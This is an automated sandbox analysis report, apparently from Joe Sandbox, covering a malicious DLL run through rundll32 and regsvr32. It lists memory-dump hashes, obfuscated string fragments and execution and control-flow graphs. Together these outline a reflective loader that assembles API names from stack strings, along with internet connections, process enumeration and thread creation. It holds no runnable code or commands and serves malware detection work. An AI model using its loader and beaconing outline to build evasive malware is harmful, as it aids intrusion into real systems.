                                                                    • Source File: 00000004.00000002.398034910.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: =_$F)k$b/$syG
                                                                    • API String ID: 0-3955183656
                                                                    • Opcode ID: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                    • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                    • Opcode Fuzzy Hash: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                    • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.398034910.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #X$'Xsa$iJ6$vG
                                                                    • API String ID: 0-746338152
                                                                    • Opcode ID: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                    • Instruction ID: 8ba50615c78112980223cca8f04f1fa67c4b69ee5a809e4e0bd2b8ae6832a1bb
                                                                    • Opcode Fuzzy Hash: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                    • Instruction Fuzzy Hash: 93E154B590070DDFCB88DF68D19A9DD7BB9BB49308F404029FC0E9A264D3B4E919CB56
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.398034910.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *i^$MIC$-Z$]2
                                                                    • API String ID: 0-498664264
                                                                    • Opcode ID: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                    • Instruction ID: 9792ecb135b2155067e966d5e38dbf4f409fde80c29e70d57d2078ebe1ce15c6
                                                                    • Opcode Fuzzy Hash: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                    • Instruction Fuzzy Hash: 10E1C670109B888FDBF8DF64CC86BEB7BA5FB44346F10651DD84A8A290DBB46645CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.398034910.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: B$EG$QsF$_
                                                                    • API String ID: 0-784369960
                                                                    • Opcode ID: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                    • Instruction ID: 62dbbc71664ee0946fffbba3b71afe09b12d9ffe0d1744d6deb9db65ff0cd9cc
                                                                    • Opcode Fuzzy Hash: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                    • Instruction Fuzzy Hash: 3FB1387010468D8FDF88DF28C88A6DA3FA1FB68388F614219FC4A97250C778D694CBC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.398034910.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: -`G$.$5B.Y$Z`35
                                                                    • API String ID: 0-1363032466
                                                                    • Opcode ID: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                    • Instruction ID: b244d414363a4385de25ad5610b22aaac7fb2f2c92cf8150697ad32e565f4bd8
                                                                    • Opcode Fuzzy Hash: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                    • Instruction Fuzzy Hash: 29A1FB716157888FEB7ADF24C89A7CE7BE1FB49308F40461DD98E8A250D7B49609CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.398034910.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: *+_$WSh$\O$#o
                                                                    • API String ID: 0-1846314129
                                                                    • Opcode ID: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                    • Instruction ID: 175ce4bc0e22c7a636d32034be2bbb8ad42f6b3cb6a748f64f507b7f0b29ed37
                                                                    • Opcode Fuzzy Hash: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                    • Instruction Fuzzy Hash: 1971167160474ECFCB98DF18C489ADA3BE1FB58318F414529FC09A7264DB74DAA8CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.398034910.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .B$O$M*K$\<
                                                                    • API String ID: 0-3225238681
                                                                    • Opcode ID: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                    • Instruction ID: 95d2fbb8f7fe970b1359d27f41ccd6aad584115d4fee043204e0c0f4c3f3b287
                                                                    • Opcode Fuzzy Hash: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                    • Instruction Fuzzy Hash: 7181E370549788CFEBBACF24C886BDE7BE4FB48744F20461DE85A8A260DB709645CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.398034910.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$$$xVO$~O
                                                                    • API String ID: 0-3655128719
                                                                    • Opcode ID: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                    • Instruction ID: 8f78542db34460f4381821bab2b7e4f68a699ed7f8b2fc47c959991f0b02677a
                                                                    • Opcode Fuzzy Hash: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                    • Instruction Fuzzy Hash: 5B61D1B05187448FD369DF28C18965BBBF1FBC6744F008A1EF6868A260DB76D948CB47
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.398034910.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ,IW$G$JMg$l
                                                                    • API String ID: 0-1370644289
                                                                    • Opcode ID: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                    • Instruction ID: 7fb8b97fd43ed4dc52a467cdcf5cca41e6e56dbc92574a5c866222c6b731b82a
                                                                    • Opcode Fuzzy Hash: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                    • Instruction Fuzzy Hash: 0A41D3B190074E8FCB48CF64C88A5DE7FB0FB18358F10461EE85AA6250D7B89695CFC9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.398034910.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ,$,$2S=$i`}G
                                                                    • API String ID: 0-4285990414
                                                                    • Opcode ID: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                    • Instruction ID: 665cb0e6160ce90faac3fa7baf9a16caae401c848b442bb7533a8cc1fd62885f
                                                                    • Opcode Fuzzy Hash: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                    • Instruction Fuzzy Hash: 4D41E57051CB848FD7B4DF18D486BDABBE0FB98750F40495EE48DC3251DBB0A8858B86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:18.9%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:5%
                                                                    Total number of Nodes:80
                                                                    Total number of Limit Nodes:9
                                                                    execution_graph 3902 18001aca4 3907 18001ad22 3902->3907 3903 18001ba75 3907->3903 3908 180012b50 3907->3908 3911 18000a4fc 3907->3911 3914 18001cec4 3907->3914 3910 180012b8a 3908->3910 3909 180012bfb InternetOpenW 3909->3907 3910->3909 3913 18000a572 3911->3913 3912 18000a5f0 HttpOpenRequestW 3912->3907 3913->3912 3916 18001cf4a 3914->3916 3915 18001cfe2 InternetConnectW 3915->3907 3916->3915 3917 180015388 3920 1800227d4 3917->3920 3919 1800153e3 3924 18002281d 3920->3924 3922 180024315 3922->3919 3924->3922 3926 18001c05c 3924->3926 3930 18001c568 3924->3930 3937 180017908 3924->3937 3928 18001c0af 3926->3928 3929 18001c2e1 3928->3929 3941 18002ad58 3928->3941 3929->3924 3933 18001c58a 3930->3933 3932 18001c948 3932->3924 3933->3932 3948 180003598 3933->3948 3952 18000ac48 3933->3952 3956 180025dac 3933->3956 3960 1800097c0 3933->3960 3939 180017932 3937->3939 3938 180015e2c CreateThread 3938->3939 3939->3938 3940 180017bcd 3939->3940 3940->3924 3944 1800046a8 3941->3944 3943 18002ae38 3943->3928 3947 1800046ec 3944->3947 3945 180004982 3945->3943 3946 180004945 Process32FirstW 3946->3947 3947->3945 3947->3946 3950 180003640 3948->3950 3949 1800044c0 3949->3933 3950->3949 3964 18001ed50 3950->3964 3954 18000ac8e 3952->3954 3953 18000b5fe 3953->3933 3954->3953 3955 18001ed50 CreateFileW 3954->3955 3955->3954 3959 180025dde 3956->3959 3958 180026180 3958->3933 3959->3958 3971 180015e2c 3959->3971 3961 1800097fc 3960->3961 3962 18000981d 3961->3962 3963 18001ed50 CreateFileW 3961->3963 3962->3933 3963->3961 3966 18001ed7a 3964->3966 3967 18001f06b 3966->3967 3968 18000fb00 3966->3968 3967->3950 3970 18000fb80 3968->3970 3969 18000fc15 CreateFileW 3969->3966 3970->3969 3972 180015ea5 3971->3972 3973 180015f3b CreateThread 3972->3973 3973->3959 3974 1380000 3975 1380183 3974->3975 3976 138043e VirtualAlloc 3975->3976 3980 1380462 3976->3980 3977 1380a7b 3978 1380531 GetNativeSystemInfo 3978->3977 3979 138056d VirtualAlloc 3978->3979 3984 138058b 3979->3984 3980->3977 3980->3978 3981 1380a00 3981->3977 3982 1380a56 RtlAddFunctionTable 3981->3982 3982->3977 3983 13809d9 VirtualProtect 3983->3984 3984->3981 3984->3983 3984->3984 3985 180015e2c 3986 180015ea5 3985->3986 3987 180015f3b CreateThread 3986->3987 3988 18001496c 3989 1800149ce 3988->3989 3990 18000fb00 CreateFileW 3989->3990 3991 1800152ba 3989->3991 3990->3989 3992 180024d80 3994 180024eed 3992->3994 3993 1800250bd 3994->3993 3996 180019a30 3994->3996 3997 180019aa4 3996->3997 3998 180019b2a GetVolumeInformationW 3997->3998 3998->3993

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 1380000-1380460 call 1380aa8 * 2 VirtualAlloc 22 138048a-1380494 0->22 23 1380462-1380466 0->23 26 138049a-138049e 22->26 27 1380a91-1380aa6 22->27 24 1380468-1380488 23->24 24->22 24->24 26->27 28 13804a4-13804a8 26->28 28->27 29 13804ae-13804b2 28->29 29->27 30 13804b8-13804bf 29->30 30->27 31 13804c5-13804d2 30->31 31->27 32 13804d8-13804e1 31->32 32->27 33 13804e7-13804f4 32->33 33->27 34 13804fa-1380507 33->34 35 1380509-1380511 34->35 36 1380531-1380567 GetNativeSystemInfo 34->36 37 1380513-1380518 35->37 36->27 38 138056d-1380589 VirtualAlloc 36->38 39 138051a-138051f 37->39 40 1380521 37->40 41 138058b-138059e 38->41 42 13805a0-13805ac 38->42 43 1380523-138052f 39->43 40->43 41->42 44 13805af-13805b2 42->44 43->36 43->37 46 13805c1-13805db 44->46 47 13805b4-13805bf 44->47 48 138061b-1380622 46->48 49 13805dd-13805e2 46->49 47->44 50 1380628-138062f 48->50 51 13806db-13806e2 48->51 52 13805e4-13805ea 49->52 50->51 55 1380635-1380642 50->55 56 13806e8-13806f9 51->56 57 1380864-138086b 51->57 53 138060b-1380619 52->53 54 13805ec-1380609 52->54 53->48 53->52 54->53 54->54 55->51 60 1380648-138064f 55->60 61 1380702-1380705 56->61 58 1380871-138087f 57->58 59 1380917-1380929 57->59 64 138090e-1380911 58->64 62 138092f-1380937 59->62 63 1380a07-1380a1a 59->63 65 1380654-1380658 60->65 66 13806fb-13806ff 61->66 67 1380707-138070a 61->67 69 138093b-138093f 62->69 88 1380a1c-1380a27 63->88 89 1380a40-1380a4a 63->89 64->59 68 1380884-13808a9 64->68 70 13806c0-13806ca 65->70 66->61 71 1380788-138078e 67->71 72 138070c-138071d 67->72 95 13808ab-13808b1 68->95 96 1380907-138090c 68->96 75 13809ec-13809fa 69->75 76 1380945-138095a 69->76 73 138065a-1380669 70->73 74 13806cc-13806d2 70->74 78 1380794-13807a2 71->78 77 138071f-1380720 72->77 72->78 84 138067a-138067e 73->84 85 138066b-1380678 73->85 74->65 80 13806d4-13806d5 74->80 75->69 86 1380a00-1380a01 75->86 82 138097b-138097d 76->82 83 138095c-138095e 76->83 87 1380722-1380784 77->87 90 13807a8 78->90 91 138085d-138085e 78->91 80->51 100 138097f-1380981 82->100 101 13809a2-13809a4 82->101 97 138096e-1380979 83->97 98 1380960-138096c 83->98 102 138068c-1380690 84->102 103 1380680-138068a 84->103 99 13806bd-13806be 85->99 86->63 87->87 104 1380786 87->104 105 1380a38-1380a3e 88->105 93 1380a7b-1380a8e 89->93 94 1380a4c-1380a54 89->94 92 13807ae-13807d4 90->92 91->57 129 1380835-1380839 92->129 130 13807d6-13807d9 92->130 93->27 94->93 111 1380a56-1380a79 RtlAddFunctionTable 94->111 108 13808bb-13808c8 95->108 109 13808b3-13808b9 95->109 96->64 112 13809be-13809bf 97->112 98->112 99->70 113 1380989-138098b 100->113 114 1380983-1380987 100->114 106 13809ac-13809bb 101->106 107 13809a6-13809aa 101->107 116 1380692-13806a3 102->116 117 13806a5-13806a9 102->117 115 13806b6-13806ba 103->115 104->78 105->89 110 1380a29-1380a35 105->110 106->112 107->112 120 13808ca-13808d1 108->120 121 13808d3-13808e5 108->121 119 13808ea-13808fe 109->119 110->105 111->93 118 13809c5-13809cb 112->118 113->101 124 138098d-138098f 113->124 114->112 115->99 116->115 117->99 125 13806ab-13806b3 117->125 126 13809d9-13809e9 VirtualProtect 118->126 127 13809cd-13809d3 118->127 119->96 139 1380900-1380905 119->139 120->120 120->121 121->119 131 1380999-13809a0 124->131 132 1380991-1380997 124->132 125->115 126->75 127->126 136 138083b 129->136 137 1380844-1380850 129->137 134 13807db-13807e1 130->134 135 13807e3-13807f0 130->135 131->118 132->112 140 1380812-138082c 134->140 141 13807fb-138080d 135->141 142 13807f2-13807f9 135->142 136->137 137->92 138 1380856-1380857 137->138 138->91 139->95 140->129 144 138082e-1380833 140->144 141->140 142->141 142->142 144->130
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.775291763.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_1380000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                    • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                    • API String ID: 394283112-2517549848
                                                                    • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                    • Instruction ID: b58542cac88ff7cf5ce3f3525afcab7f742f988836be07e1ecb94fcab51f9f8e
                                                                    • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                    • Instruction Fuzzy Hash: BC72C331618B488FDB2DEF18C8856B9B7E1FB98309F14462DE8CAD7211DB34D586CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.776811676.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #X$Ec;$J$^c$^c$n
                                                                    • API String ID: 0-2929744921
                                                                    • Opcode ID: 4bf1a5684c4273f47db2f7bfe37ec9194a020a583a1b353a94edbff9173a6149
                                                                    • Instruction ID: 2841c3f5e183e4376706155e5f630a85a86355917b0bfec54de2fd5c82beda78
                                                                    • Opcode Fuzzy Hash: 4bf1a5684c4273f47db2f7bfe37ec9194a020a583a1b353a94edbff9173a6149
                                                                    • Instruction Fuzzy Hash: DB0214705187C88BC798DFA8C48965EFBE1FB98744F108A1DF48687660DBF4D948CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 634 1800132f0-18001332a 635 18001332c-180013331 634->635 636 1800136a3 635->636 637 180013337-18001333c 635->637 638 1800136a8-1800136ad 636->638 639 180013342-180013347 637->639 640 1800135f0-18001368c call 180021434 637->640 638->635 641 1800136b3-1800136b6 638->641 639->638 643 18001334d-1800133c6 call 18001a754 639->643 646 180013691-180013697 640->646 644 180013759-180013760 641->644 645 1800136bc-180013757 call 180013e28 641->645 648 1800133cb-1800133d0 643->648 650 180013763-18001377d 644->650 645->650 646->641 651 180013699-18001369e 646->651 648->645 653 1800133d6-1800133db 648->653 652 1800135e2-1800135eb 651->652 652->635 653->641 655 1800133e1-1800133e6 653->655 655->652 656 1800133ec-1800134a8 call 180021434 655->656 656->641 659 1800134ae-1800135dc call 180016428 call 180013e28 656->659 659->641 659->652
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.776811676.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: =_$F)k$b/$syG
                                                                    • API String ID: 0-3955183656
                                                                    • Opcode ID: 78e362ff9fa706a76cdd339057cb87764c88e196f3f9d59d0d5946dc172ac972
                                                                    • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                    • Opcode Fuzzy Hash: 78e362ff9fa706a76cdd339057cb87764c88e196f3f9d59d0d5946dc172ac972
                                                                    • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.776811676.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 5IF$P)#
                                                                    • API String ID: 0-1025399686
                                                                    • Opcode ID: f542572e4f2ff63548a52b2cdf5e12f4f3f89a6a74df4dd4d6ea84f2146f04ed
                                                                    • Instruction ID: ff53fea05c8e9f3baddf865253a509f05c382ca6cc85a3c859ee45a04624b947
                                                                    • Opcode Fuzzy Hash: f542572e4f2ff63548a52b2cdf5e12f4f3f89a6a74df4dd4d6ea84f2146f04ed
                                                                    • Instruction Fuzzy Hash: 0B9182711197889FCBA9DF18C8857DEB7E0FB88744F90561DF84A8B260C7B4DA49CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 584 18001cec4-18001cf6a call 1800142a0 587 18001cfe2-18001d01f InternetConnectW 584->587 588 18001cf6c-18001cfdc call 18000dd70 584->588 588->587
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.776811676.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ConnectInternet
                                                                    • String ID: :G?$C
                                                                    • API String ID: 3050416762-1225920220
                                                                    • Opcode ID: 76a7b635ccb7068e30ecf2b503a3beb8f1d88f81d4224a3a6f9b87d06452e60c
                                                                    • Instruction ID: f2a8b8884ccc4c3404819a5ba5e10ed0cdd0f68caef2c301b3e7290f999a0a2a
                                                                    • Opcode Fuzzy Hash: 76a7b635ccb7068e30ecf2b503a3beb8f1d88f81d4224a3a6f9b87d06452e60c
                                                                    • Instruction Fuzzy Hash: 5941F67450CB888FD7A8DF18D0857AAB7E0FB98314F508A5EE8CDC7296DB749844CB46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.776811676.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID: gF\
                                                                    • API String ID: 823142352-1982329323
                                                                    • Opcode ID: 7df644aaf73cc9bcde4b6fb7fa72ed7f80eca5e2f74ec0139d961ef78fad827b
                                                                    • Instruction ID: 218d4d5182cb26b0f36475523bc21bdebfc34a2f4da3002633262ff40041eb9b
                                                                    • Opcode Fuzzy Hash: 7df644aaf73cc9bcde4b6fb7fa72ed7f80eca5e2f74ec0139d961ef78fad827b
                                                                    • Instruction Fuzzy Hash: 1931697051C7848BD778DF28D48679ABBE0FB89304F10891EE88DC3352DB709885CB86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.776811676.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: HttpOpenRequest
                                                                    • String ID: :G?
                                                                    • API String ID: 1984915467-1508054202
                                                                    • Opcode ID: 21630c4fbef06d8aacd4c702dff3e94d0932750c237c7792a79e645746d5d1eb
                                                                    • Instruction ID: 60d2efcdc3634c8de813e735c521a1a1b2f1d3197bf379f764bafd55f5181dd8
                                                                    • Opcode Fuzzy Hash: 21630c4fbef06d8aacd4c702dff3e94d0932750c237c7792a79e645746d5d1eb
                                                                    • Instruction Fuzzy Hash: 83314E7060CB848FDBA8DF18D08679BB7E0FB98315F50455DE88CC7296DB789944CB86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.776811676.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InternetOpen
                                                                    • String ID: :G?
                                                                    • API String ID: 2038078732-1508054202
                                                                    • Opcode ID: 73d4d0fe1beb5fabfcdff42c943db3c290933a411410652e7bad060f5d798a44
                                                                    • Instruction ID: c9298170b99e71c9961e7bb575de84f4b40d7dd1197e6373e1c7e5d4160ea6d3
                                                                    • Opcode Fuzzy Hash: 73d4d0fe1beb5fabfcdff42c943db3c290933a411410652e7bad060f5d798a44
                                                                    • Instruction Fuzzy Hash: 6F110A71518B888BD3A4DF64D48979BB7E1FB88319F50CA1DF4D9C6250DB788589CB02
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.776811676.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    • Opcode ID: e7c4e665c3955ccb08a2ed1da7b867fe01ee184c9f438c553d3e32e703deb0b1
                                                                    • Instruction ID: c545beb4aab352fd45c13a3c06d211153dc7cc573a2023b45670cfe369ebb01f
                                                                    • Opcode Fuzzy Hash: e7c4e665c3955ccb08a2ed1da7b867fe01ee184c9f438c553d3e32e703deb0b1
                                                                    • Instruction Fuzzy Hash: 0731F67061CB448FD7A8DF68D48579ABBE0FB88304F508A5EE88CD7356DB349944CB86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.776811676.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InformationVolume
                                                                    • String ID:
                                                                    • API String ID: 2039140958-0
                                                                    • Opcode ID: 88af29f83271a8505691566097a2d6f523e627b34a42d7322f8369dcba0ae3fb
                                                                    • Instruction ID: 89e8e56e51c5a60af2ecd67268569f3ffacd31b875f751963744359e30ad4776
                                                                    • Opcode Fuzzy Hash: 88af29f83271a8505691566097a2d6f523e627b34a42d7322f8369dcba0ae3fb
                                                                    • Instruction Fuzzy Hash: 2B31407051CB448FD7A8DF18D4C579AB7E0FB88315F60855EE88CC7255CB749948CB86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%